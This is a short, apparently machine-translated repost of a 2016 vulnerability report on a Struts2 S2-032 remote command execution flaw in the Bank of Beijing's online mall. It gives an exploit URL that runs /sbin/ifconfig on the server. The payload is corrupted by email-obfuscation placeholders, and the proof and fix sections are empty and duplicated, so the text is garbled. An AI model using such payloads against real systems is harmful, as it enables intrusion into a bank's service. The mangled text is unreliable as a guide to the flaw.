北京银行网上商城s2-032命令执行
漏洞标题 北京银行网上商城s2-032命令执行 相关厂商 北京银行 漏洞作者 十三妹 提交时间 2016-04-26 20:20 公开时间 2016-06-12 15:30 漏洞类型 命令执行 危害等…
漏洞标题
北京银行网上商城s2-032指令执行
相关制造商
北京银行
漏洞作者
十三个妹妹
提交时间
2016-04-26 20: 20
公共时间
2016-06-12 15: 30
漏洞类型
命令执行
危险等级
高
自我评估等级
20
漏洞状态
已提交给第三方合作机构(cncert National Internet Emergency Center)
标签标签
Struts,远程命令执行
漏洞详细信息
http://**。**。**。**/mall/ui/giftIndex.action
?cmd=/sbin/ifconfig& args=-a& sm=\\\ A& [email protected]/* @ [email protected]/* [email protected]/* [email protected]/* [电子邮件 protected]/* [email protected]/* [email protected]/* @ [email protected]/* 3res.flush%28%29%2C%23res.close
漏洞证明:
修理计划:
版权声明:请注明出处。 13女孩@乌云
漏洞证明:
修理计划:
版权声明:请注明出处。 13女孩@乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 520 )
- 分类:黑客技术
